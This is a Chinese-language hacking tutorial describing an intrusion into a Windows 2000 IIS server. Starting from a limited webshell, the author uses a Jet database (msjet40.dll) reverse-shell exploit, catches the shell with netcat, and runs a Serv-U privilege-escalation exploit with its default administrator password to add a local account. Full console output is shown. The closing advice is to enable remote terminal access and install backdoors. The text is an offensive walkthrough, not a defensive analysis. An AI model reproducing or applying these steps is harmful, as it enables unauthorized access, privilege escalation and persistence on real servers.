http://www.3800hk.com/news/w31/17410.html
目标站点是WINDOWS SERVER 2000系统,IIS 5.0 Wscript.shell shell.application Wscript.network组件全部删除的情况下测试的,要是什么都没删,什么安全也没做,那这次测试也没有什么意义了.
现在管理员安全意识提高了,搞站越来越难了,往往拿到一个WEBSHELL,就不知道干些什么,除了FSO其他组件都不可以调用,就像这样的。如图1
看到了吧,入侵中对我们最有帮助的那3个组件全部删了,就一个FSO可以用,除非那个管理员是白痴,只删了组件,而没有把磁盘权限配好,很少有这样的管理员,碰到这种情况,一般就是传个Serv-u php exploit上去试下看看SERV-U密码改没,不过也不是每台机器都支持PHP的,所以这招也不是很管用,前段时间我弄了个MYSQL WEBSHELL提升都看过吧?必须要得到ROOT密码才行.最近不是出了个jet数据库溢出吗?可反弹得到一个cmdshell哦.不过是普通权限的。但是对于一些只会照着网上资料抄的管理员就N有用啦,虽然他把组件全部都删了但是,C盘的权限弄不明白,SERV-U的密码也是默认的,那就有我们的可趁之机了。好,我们先拿到个CMDSHELL再说吧,至少还能有一点机会.这里先概述一下这这个Microsoft Jet (msjet40.dll) Reverse Shell Exploit:
受影响系统:
Microsoft JET DB
不受影响系统:
Microsoft JET DB OLE Provider
详细描述:
Microsoft Jet数据库是MS Office应用程序中广泛使用的轻型数据库。msjet40.dll是Microsoft Jet数据库引擎的主要组件,可以评估并执行数据请求。
msjet40.dll解析数据库文件时没有执行充分的数据验证,这样攻击者就可以修改数据库文件,导致在打开MS Jet数据库时执行攻击者的代码。
此信息由HexView提供(EML:vuln@hexview.com)
存在漏洞的系统:
* Microsoft JET 4.00.8618.0 版
免疫系统:
* Microsoft JetDB OLE Provider
先用jet.exe生成一个反弹连接的mdb文件如图2
好了生成好咯,然后我们就通过WEBSHELL传上去,有时候传上去,但是却没有找到文件,被杀了,把改为ASP后缀. 数据库操作功能比较强的ASP木马就属站长助手了。就用它来连接我们的“恶意”MDB文件吧,好上传成功,如图3
OK现在我们就开始连接我们生成好的文件咯,为了防止被杀毒软件XX我改成ASP后缀了.连接之前我们先得监听好端口哦,哪个端口?就是前面设置的,如图4
现在开始连接我刚刚上传的那个文件.如图5
只要没出现什么灾难性的错误,就表示连接成功了,好,看看我们的NC有反映没有.如图6
成功得到一个CMDSHELL,不过权限是GUESTS组的.这个时候IIS进程已经死了,所有的ASP文件都不可执行了.所以你得提前把你的工具什么的传上去.我之前已经把serv-u溢出程序传上去咯,在c:/winnt/system32/inetsrv/data/目录下 这个目录默认是EVERYONE完全控制的我想大家都知道,我就不多说.因为都做了权限CMDSHELL下根本没法跳到WEB目录.好了,执行我们的SERV-U溢出程序,看看管理员把默认密码改没有,啊哈?溢出成功,如图7
C:/WINNT/system32/inetsrv/Data>ftp 43958 "net user chadmin 520520 /add"
ftp 43958 "net user chadmin 520520 /add"
Serv-u >溢出工具黑猫专版
<220 Serv-U FTP Server v4.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Domain xl:0 Deleted
<505 Domain not found
******************************************************
[+] Creating New Domain...
<200-DomainID=2
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<220 Domain settings saved
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user chadmin 520520 /add
<220 Domain deleted
******************************************************
[+] Domain xl:2 Deleted
C:/WINNT/system32/inetsrv/Data>
C:/WINNT/system32/inetsrv/Data>net user
net user
//QHMEDIASRV 的用户帐户
----------------------------------------------------------------
ASPNET chadmin courses
IUSR_QHMEDIASRV IWAM_QHMEDIASRV partner
SQLDebugger TsInternetUser
命令成功完成。
C:/WINNT/system32/inetsrv/Data>
没办法,还是被搞下了,终究归于管理员安全意识还不够高.权限配得不够好.后面该怎么样搞我就不用多说了,终端没开就给他开个.装后门,补漏洞。